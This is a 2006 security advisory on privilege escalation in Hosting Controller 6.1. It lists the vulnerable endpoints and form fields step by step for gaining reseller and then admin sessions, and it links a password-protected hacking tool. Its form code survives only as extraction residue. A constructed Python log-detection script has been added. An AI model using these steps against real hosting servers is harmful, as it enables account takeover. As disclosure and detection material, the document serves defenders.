
Hostingcontroller: an attacker can gain reseller privileges and after that can gain admin privileges






Hi, I'm Soroush Dalili from GrayHatz Security Group (GSG). I am publishing the most important bugs of the Hosting Controller program, 3 weeks after reporting them to the main company (for more security).

Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer URL: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discovery date: Summer 2005
Report date (to HC company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006

-------------------------------------------------------------------------------------
===============================================
1- This code gives a resadmin session to a user:
Bug in "hosting/addreseller.asp": no access check is performed.
---------------------------------------------------




Form1 (HTML form residue: only the field names survived extraction; the form's action URL is not on the page)
URL:
Fields: reseller, loginname, Password, first_name, first_name, last_name, address, city, state, country, email, phone, fax, zip, selMonth, selYear, txtcardno

---------------------------------------------------
===============================================
2- This code lists all resellers; then you must change the password of one of them and log in with it for the next step.
Note: With this code, everyone can also increase their Credit value and then buy any host.
---------------------------------------------------
Form (HTML form residue: only the action and field labels survived extraction)
action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post"
Fields: Username, Description, FullName, AccountDisabled (1 or blank), UserChangePassword, PassCheck (TRUE or 0), New Password, DefaultDiscount%, CreditLimit



---------------------------------------------------
===============================================
3- Now you must log in as the reseller whose password you changed in the last step. Go to the user list; if there is a user there, that will be enough, and if no user is available, you must create one. Select it and click Enter to log in as that user. Now the bug becomes available: each reseller can gain any user's session, even "HCADMIN", through a bug in "Check_Password.asp". The code below will help you:
---------------------------------------------------

Form1 (HTML form residue: only the action and field label survived extraction)
action="http://[URL]/Admin/Check_Password.asp" method="post"
Fields: AdName
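Added here as a defender-side example; it is not part of the original advisory or of Hosting Controller. The three endpoints named above (addreseller.asp, AccountActions.asp, Check_Password.asp) should only ever be reached by the administrator, so a web-log check can surface their misuse. The IIS W3C log lines are constructed, and the administrator account name "hcadmin" is an assumption.

```python
# Constructed sample IIS W3C log (not real data). The #Fields line names the columns.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
2006-07-06 10:00:01 203.0.113.5 - POST /hosting/addreseller.asp - 200
2006-07-06 10:00:09 203.0.113.5 reseller1 POST /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit 200
2006-07-06 10:00:20 203.0.113.5 reseller1 POST /Admin/Check_Password.asp - 302
2006-07-06 10:01:00 198.51.100.7 hcadmin POST /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit 200
2006-07-06 10:02:00 198.51.100.7 hcadmin GET /Admin/Default.asp - 200
"""

# Endpoints the advisory names as lacking an authorization check (lower-cased,
# because IIS paths are case-insensitive).
SENSITIVE_STEMS = {
    "/hosting/addreseller.asp",
    "/admin/accounts/accountactions.asp",
    "/admin/check_password.asp",
}
# Assumption: only this account is a legitimate caller of those endpoints.
ADMIN_USERS = {"hcadmin"}


def parse_w3c(text):
    """Yield one dict per log row, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_suspicious(text):
    """Return (cs-username, cs-uri-stem, cs-uri-query) for every POST to a
    sensitive endpoint made by a non-admin user; IIS logs anonymous users as '-'."""
    hits = []
    for row in parse_w3c(text):
        if row["cs-method"] != "POST":
            continue
        if row["cs-uri-stem"].lower() not in SENSITIVE_STEMS:
            continue
        if row["cs-username"].lower() not in ADMIN_USERS:
            hits.append((row["cs-username"], row["cs-uri-stem"], row["cs-uri-query"]))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print("suspicious admin-endpoint POST:", hit)
```

Each flagged row maps to one of the three steps in the advisory: the anonymous POST to addreseller.asp, the reseller changing credit/password via AccountActions.asp, and the reseller hitting Check_Password.asp.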



---------------------------------------------------
===============================================
-------------------------------------------------------------------------------------
Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks to:
  Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
  Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
  Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
  http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all HC bugs by Irsdl)
  http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code in simple VB)
